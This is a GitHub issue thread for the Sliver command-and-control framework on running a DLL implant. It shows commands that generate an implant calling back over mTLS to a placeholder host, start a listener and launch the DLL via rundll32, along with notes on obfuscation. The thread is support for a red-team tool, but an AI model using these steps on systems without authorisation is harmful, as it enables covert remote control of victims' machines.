### ISSUE TITLE
How to execute a dll implant?

### ISSUE THREAD

**Issue by Ilan-sec** [BishopFox/sliver#142]
Hello,
My question is global: How to execute a dll implant? I didn't see any Instruction for it.
Is there any entry point to run with rundll32 or something else?

Thanks.

Ilan-sec.

**Comment by rkervella** [comment]
There is the `RunSliver` export that can be used to run the dll. Otherwise, we also export a bunch of "common" functions, as can be observed [here](https://github.com/BishopFox/sliver/blob/master/sliver/sliver.go#L50-L76).

**Comment by Ilan-sec** [comment]
Thanks Ronan!
I tried it on mtls, http, https, but no way to succeed . It runs but to the C&C server it doesn't get.
Does it works on your machine?

**Comment by lesnuages** [comment]
I recall it worked last time I checked. What did you try and which version of sliver-server are you using?
Not at my computer right now, gonna test again later tonight.

**Comment by Ilan-sec** [comment]
It's 0.0.6. 
Tried: generate --mtls/https/http x.x.x.x:443 --format shared --save /save/here, than mtls/https/http --lport 443 and on implant side:    regsvr32.exe /s /u sliver.dll , rundl32 sliver.dll and also changing file name to sliver.cpl (which runs the dll naturally). no luck with any, but if I make the same with exe file, it works perfectly.

**Comment by lesnuages** [comment]
That makes sense: this stuff has been added after 0.6 was released. Although I'm pretty sure `rundll32 sliver.dll,RunSliver` should work (`regsvr32` won't on 0.6).
Also explains why you got obfuscation working.
I recommend building from source from the master branch to get the latest features (except full symbol obfuscation which is broken right now).

**Comment by rkervella** [comment]
Just tested again with v0.0.6-alpha from [here](https://github.com/BishopFox/sliver/releases/tag/v0.0.6-alpha):

```
% /tmp ./sliver-server
Unpacking assets ...

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain skulk
[*] v0.0.6 - 23cc4206acd841b030ef62d1e80d6839478dfb6a
[*] Welcome to the sliver shell, please type 'help' for options

sliver > generate --format shared --skip-symbols --save /tmp --mtls ab.cd:8888

[*] Generating new windows/amd64 Sliver binary
[!] Symbol obfuscation is disabled
[*] Build completed in 00:00:06
[*] Sliver binary saved to: /tmp/FRANTIC_FOREST.dll

sliver > mtls

[*] Starting mTLS listener ...
[*] Successfully started job #1
```
Then on Windows 10, just ran `rundll32 FRANTIC_FOREST.dll,RunSliver` and got a session:

```
[*] Session #1 FRANTIC_FOREST - ab.cd:49762 (XXXX) - windows/amd64
```

**Comment by Ilan-sec** [comment]
great, thanks.
I also tried it and it works, but although in v 0.0.6 you can obfuscate
implants, include dlls, when it comes to session, just dll that didn't pass
obfuscation really gives a session.

‫בתאריך יום ה׳, 2 בינו׳ 2020 ב-10:08 מאת ‪Ronan Kervella‬‏ <‪
notifications@github.com‬‏>:‬

**Comment by Ilan-sec** [comment]
By the way, is there a way to establishing a mtls session between an implant and other C&C with the same listener properties (not the server who makes the implant)?
Maybe there is a need to import a sliver to the new C&C server?

Thanks a lot!

Ilan-sec

**Comment by rkervella** [comment]
@Ilan-sec : My best bet is that in v0.0.6 we obfuscate the `RunSliver` symbol when doing full obfuscation, which obviously does not work when you try to run it through `rundll32 sliver.dll,RunSliver`. Again, I recommend building from source and using the latest version in master, if you don't care about full symbol obfuscation for now.

As for the custom C&C support, it's not going to work without adapting your C&C. Basically, you'd have to modify your C2 to support the application communication layer, which means protobuf plus some crypto. So it won't work out of the box.

I'm closing this issue, as there is not much more to discuss here related to the original problem.
If you have a bug to report, please use the issue template to report it. Otherwise, if you wanna discuss sliver features, we're both pretty active on the [Bloodhound Slack](https://bloodhoundhq.slack.com), in the #golang channel.

**Comment by Ilan-sec** [comment]
great thanks!

‫בתאריך יום ב׳, 6 בינו׳ 2020 ב-11:57 מאת ‪Ronan Kervella‬‏ <‪
notifications@github.com‬‏>:‬

**Comment by ErenYeager29** [comment]
rundll32.exe (name).dll,RunSliver

still works on Latest Windows 11 build (26200) got the beacon
